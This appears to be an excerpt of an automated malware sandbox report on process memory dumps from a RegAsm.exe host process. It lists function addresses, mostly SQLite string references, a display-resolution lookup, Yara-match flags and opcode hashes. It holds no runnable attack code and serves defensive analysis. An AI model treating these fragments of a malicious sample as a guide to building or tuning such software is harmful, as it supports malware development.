                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                                                                                                                                                                                • Instruction ID: a754f903f330e8cdaa808d6a3848bf6dda433f6ef70fdc4e692f9babce47c66e
                                                                                                                                                                                                • Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B2191AAD0065276FB02BF216C02FEF729C5F95256F05885CFD65A2242F738E64543B3
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4AE170 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 445COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: fts5$fts5_source_id$fts5vocab$porter$snippet$unable to delete/modify user-function due to active statements$unicode61
                                                                                                                                                                                                • API String ID: 0-2986783930
                                                                                                                                                                                                • Opcode ID: 7540d568461e11ad9623dc0c9e0d620a285d1e086c66ba00c519816b3460ab24
                                                                                                                                                                                                • Instruction ID: ae49f42ecaaf310123f85fa146ab3196a11e15eedf27a9bfa7ddc5659d631eb9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7540d568461e11ad9623dc0c9e0d620a285d1e086c66ba00c519816b3460ab24
                                                                                                                                                                                                • Instruction Fuzzy Hash: 58F1E3B4A05301DBF7049F26DC85B8B7BE9BF90384F40456CE88A97281E775E558CBE2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5AFB30 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 324COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B5AFBA0
                                                                                                                                                                                                • API called with finalized prepared statement, xrefs: 1B5AFB7A
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B5AFBA5
                                                                                                                                                                                                • API called with NULL prepared statement, xrefs: 1B5AFB65
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B5AFB96
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-860711957
                                                                                                                                                                                                • Opcode ID: 8552df9e4f768bc4d8598d0c1edfcb3f1e2ee19b9df76714dc9393bcb841ab76
                                                                                                                                                                                                • Instruction ID: f4d0fc1b259d0cc38eeadb8bec9971ff55b8e20cb6f15744a7a74852da40fea4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8552df9e4f768bc4d8598d0c1edfcb3f1e2ee19b9df76714dc9393bcb841ab76
                                                                                                                                                                                                • Instruction Fuzzy Hash: D9B1F4B49043419FF720AF35D845B9BB7E4BF44718F04492CE88AE7281E776E449C7A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B521710 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 235COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
                                                                                                                                                                                                • API String ID: 0-3324442540
                                                                                                                                                                                                • Opcode ID: a82e5fdea01da0b329044763abde7cf27f6f211008d8ec5e4da6d02d58c11948
                                                                                                                                                                                                • Instruction ID: 154a43d0e366548598ef5846087b762aa173dddde3387ee501f069de07f89800
                                                                                                                                                                                                • Opcode Fuzzy Hash: a82e5fdea01da0b329044763abde7cf27f6f211008d8ec5e4da6d02d58c11948
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A81F076A01211EFEB018F64DC85B8BB7E8FF94265F040669FC84E7250D732E954CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4EE320 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 177COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4EE380
                                                                                                                                                                                                • API called with finalized prepared statement, xrefs: 1B4EE36A
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4EE385
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4EE376
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3620335220
                                                                                                                                                                                                • Opcode ID: faf7aa9fe5189341562b881b5a826fec9e446e82bdd0ace813933b9003202f24
                                                                                                                                                                                                • Instruction ID: 4dafa5f31757a5278447ff31cc1aaba0a9665b22c1032a0bf5944571943aeb54
                                                                                                                                                                                                • Opcode Fuzzy Hash: faf7aa9fe5189341562b881b5a826fec9e446e82bdd0ace813933b9003202f24
                                                                                                                                                                                                • Instruction Fuzzy Hash: E051B571D00221DBEB658F64DC8DBDA3768AFA4316F04C42CED8996341D739E588CBB2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5974A0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 175COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B5974D7
                                                                                                                                                                                                • invalid, xrefs: 1B5974BC
                                                                                                                                                                                                • API call with %s database connection pointer, xrefs: 1B5974C1
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B5974DC
                                                                                                                                                                                                • unable to close due to unfinalized statements or unfinished backups, xrefs: 1B5975D1
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B5974CD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                • API String ID: 0-3800776574
                                                                                                                                                                                                • Opcode ID: c3aaedfd4f9b1d1ba8ffa6f16768def9d9983f0a4263c6982f5f15076eaf67b0
                                                                                                                                                                                                • Instruction ID: 745a3c76535adb5c6e6fc68e6b9a0446e324d6b07d9f13e7e4a8b56027371246
                                                                                                                                                                                                • Opcode Fuzzy Hash: c3aaedfd4f9b1d1ba8ffa6f16768def9d9983f0a4263c6982f5f15076eaf67b0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 84514775A00711ABF7119F38FC89BDB77A9AF90214F05442EE8EA93201E730F545C7A6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B53BCF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 1B53BD67
                                                                                                                                                                                                • PRAGMA %Q.page_size, xrefs: 1B53BD03
                                                                                                                                                                                                • undersize RTree blobs in "%q_node", xrefs: 1B53BDA1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
                                                                                                                                                                                                • API String ID: 0-3485589083
                                                                                                                                                                                                • Opcode ID: 7963bdda837c4ce5170bd92aa0cc645d6e1855e17d058aacf264ad953bbb41a8
                                                                                                                                                                                                • Instruction ID: 000b32e08c196d49fa3381a18d92f41cff572c7162dcbcd192cbed960ac4b97a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7963bdda837c4ce5170bd92aa0cc645d6e1855e17d058aacf264ad953bbb41a8
                                                                                                                                                                                                • Instruction Fuzzy Hash: F431B4B1A00211ABF7048F65DC84BDA7BBCEB98356F004A29FC85D6321D735E958DBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040F3ED Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0040F402
                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040F40D
                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040F418
                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0040F423
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00413CF0,?,00000000,?,Display Resolution: ,00000000,?,004255B0,00000000,?), ref: 0040F42F
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00413CF0,?,00000000,?,Display Resolution: ,00000000,?,004255B0,00000000,?,00000000), ref: 0040F436
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040F448
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                • String ID: %dx%d
                                                                                                                                                                                                • API String ID: 3940144428-2206825331
                                                                                                                                                                                                • Opcode ID: 5c19b7d1c26090864035b4511e7466069b565c9ce0d08ad1df0c07519e683e3f
                                                                                                                                                                                                • Instruction ID: e0aa5cb377fd9a4d6f668c4785e13fa4c5f16bf34494e881d495f65158ee2036
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c19b7d1c26090864035b4511e7466069b565c9ce0d08ad1df0c07519e683e3f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 69F0D135A01224FBE7106BA6AC0DE9F7E6DFF4BBA1F001015FA01A3150D6754A018BB4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5932F0 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 464COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: f806a499c84659f80691f49cd4cda1903242f0ee33ee49ed6d3ff8e1644f3a0d
                                                                                                                                                                                                • Instruction ID: b9073483952595b6969f98a04f276e677707d37e99ebd57ac0d3ed86fa9e9c01
                                                                                                                                                                                                • Opcode Fuzzy Hash: f806a499c84659f80691f49cd4cda1903242f0ee33ee49ed6d3ff8e1644f3a0d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F12271A04651DFE700DF28D8C4AE6BBF0FF94215F4456A9E888CB252E331E95AC7A1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C28E5 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 346COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • malformed inverted index for FTS5 table %s.%s, xrefs: 1B4C2A8A
                                                                                                                                                                                                • INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1B4C29F1
                                                                                                                                                                                                • unable to validate the inverted index for FTS5 table %s.%s: %s, xrefs: 1B4C2AA0
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS5 table %s.%s$unable to validate the inverted index for FTS5 table %s.%s: %s
                                                                                                                                                                                                • API String ID: 0-3572959941
                                                                                                                                                                                                • Opcode ID: a58b9ef65bdd4dee89e28b3c85a24f7b663237a4ba77b229b7ef541b9a241c18
                                                                                                                                                                                                • Instruction ID: 486b4dcf584dd4a957c3933d584160f0cf1e1c4bbb9d0d372beaa4497cae0545
                                                                                                                                                                                                • Opcode Fuzzy Hash: a58b9ef65bdd4dee89e28b3c85a24f7b663237a4ba77b229b7ef541b9a241c18
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7241E376901221ABD3148F69DC88EDB7BACFF94665F04452DFC8D82200D732D699CBE2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A9700 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 277COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
